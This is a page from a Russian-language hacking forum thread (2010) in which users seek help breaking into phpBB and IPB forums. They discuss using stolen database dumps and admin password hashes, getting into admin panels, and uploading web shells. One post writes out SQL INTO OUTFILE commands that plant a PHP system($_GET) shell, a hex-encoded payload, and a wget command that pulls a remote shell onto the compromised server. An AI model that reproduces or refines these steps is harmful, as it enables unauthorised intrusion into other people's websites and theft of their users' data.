ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #301  
Старый 04.04.2010, 23:53
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от tack3r  
сижу в панели администратора на форуме двиг phpbb
не могу найти где тут сделать дамп бд . подскажите?
сначала коннектис к БД
 
Ответить с цитированием

ipb 2.3.6
  #302  
Старый 09.04.2010, 15:41
Аватар для Dimanok
Dimanok
Новичок
Регистрация: 24.06.2009
Сообщений: 3
Провел на форуме:
7257

Репутация: 0
По умолчанию ipb 2.3.6

Есть что-нибудь на ipb 2.3.6 ?
 
Ответить с цитированием

  #303  
Старый 12.04.2010, 11:48
Аватар для nik3241
nik3241
Новичок
Регистрация: 04.03.2008
Сообщений: 12
Провел на форуме:
34288

Репутация: 37
Отправить сообщение для nik3241 с помощью ICQ
По умолчанию

Цитата:
Сообщение от tack3r  
сижу в панели администратора на форуме двиг phpbb
не могу найти где тут сделать дамп бд . подскажите?

вообще дампить бд лучше Этим дампером а не из админки, так надёжней и качественней.
 
Ответить с цитированием

  #304  
Старый 12.04.2010, 17:56
Аватар для mayhem
mayhem
Новичок
Регистрация: 12.02.2010
Сообщений: 3
Провел на форуме:
2379

Репутация: 0
По умолчанию

Есть Учетка главного модератора на форуме phpBB 3.0.7, есть ли какие нибудь уязвимости на заливку шела или доступа к админке форума?
 
Ответить с цитированием

  #305  
Старый 12.04.2010, 22:44
Аватар для JogaBonito
JogaBonito
Новичок
Регистрация: 29.05.2009
Сообщений: 2
Провел на форуме:
18277

Репутация: 0
По умолчанию

Есть дамп pb_2010-04-02_02-35.sql чё можно добыть ? кроме майлов и хешей ?
 
Ответить с цитированием

  #306  
Старый 22.04.2010, 18:11
Аватар для ~d0s~
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

del

Последний раз редактировалось ~d0s~; 10.05.2010 в 04:57..
 
Ответить с цитированием

  #307  
Старый 23.04.2010, 23:39
Аватар для InfectedM
InfectedM
Познающий
Регистрация: 04.11.2007
Сообщений: 51
Провел на форуме:
310791

Репутация: 6
Отправить сообщение для InfectedM с помощью ICQ
По умолчанию

Есть форум phpBB © 2001, 2005 phpBB Group
Есть логин админа и 100% правильный пароль.
Но почему-то пишет что не подходит.
В пхпбб есть какиенить привязки акка по ip?
Если да,то как правило привязка осуществляется по маске подсети? если подискать подходящую прокси получится войти войти?

Последний раз редактировалось InfectedM; 23.04.2010 в 23:46..
 
Ответить с цитированием

  #308  
Старый 24.04.2010, 00:00
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от InfectedM  
Есть форум phpBB © 2001, 2005 phpBB Group
Есть логин админа и 100% правильный пароль.
Но почему-то пишет что не подходит.
В пхпбб есть какиенить привязки акка по ip?
Если да,то как правило привязка осуществляется по маске подсети? если подискать подходящую прокси получится войти войти?
если ты подходишь близко к скрипту авторизации значит уже нет привязка к ip,

а твой пароль может быть пароль к админке а не пароль к форуму,

с какой таблицы вытащил? phpbb_users??
 
Ответить с цитированием

  #309  
Старый 24.04.2010, 04:03
Аватар для InfectedM
InfectedM
Познающий
Регистрация: 04.11.2007
Сообщений: 51
Провел на форуме:
310791

Репутация: 6
Отправить сообщение для InfectedM с помощью ICQ
По умолчанию

Все...там 2 базы от форума было -)стащил с 2 базы пас
Залогинился на форуме под админом.
но Теперь не заходит в админку
Пароль админа от админки и форума может бытьразным?
Если да ,то где искать пароль от админки?

Последний раз редактировалось InfectedM; 24.04.2010 в 04:05..
 
Ответить с цитированием

  #310  
Старый 26.04.2010, 04:11
Аватар для Linkus
Linkus
Участник форума
Регистрация: 20.12.2008
Сообщений: 130
Провел на форуме:
436500

Репутация: 11
По умолчанию

Пытаюсь залить шелл на форум ипб (впервые), вот возникло пару вопросов, знающие люди пожалуйста помогите

Заливаю через мускуль

CREATE TABLE `ibf_shell` (`shl` TEXT NOT NULL) TYPE = MYISAM ; - прошло успешно
INSERT INTO `ibf_shell` ( `shl` ) VALUES (`<?system($_GET[‘c’]) ?>`); - тут жопа, команда не выполняется. Пишет Unknown column '' in 'field list'. (ругается на system($_GET)). Тобишь мне в колонке shl надо создать такую команду. Уверен на 80% что синтаксис неправильный.
SELECT `shl` FROM `ibf_shell` INTO OUTFILE `/www/forum/uploads/shell.php` - не дошел
DROP TABLE `ibf_shell` - прошло успешно

В общем загвоздка со второй строкой, как я уже писал - синтаксис неправильный. Уже и так и сяк пробовал, не выходит.

Потом сразу же вопрос, после выполнения этих мускуль комманд (удачно), мне прийдется дать cmd команды на сервер как я понимаю. Это делается посредством браузерной строки? Где можно просмотреть все возможные команды?

Читал что нужно выполнить запрос в строке браузера типа _http://www.xxx.com?c=wget -O shell.php _http://vasiliy.narod.ru/shell.php.

Заливаю через мускуль ибо другие способы не пашут... Смайлы, аттачи и пхтмл перепробовал.

Заранее спасибо!!

UPD

select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php'

Access denied for user 'site.ru'@'localhost' (using password: YES)

Нехватает прав?

Последний раз редактировалось Linkus; 26.04.2010 в 11:43..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ *NIX ] Задай вопрос - получи ответ. Xszz *nix 1547 15.06.2010 15:41
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ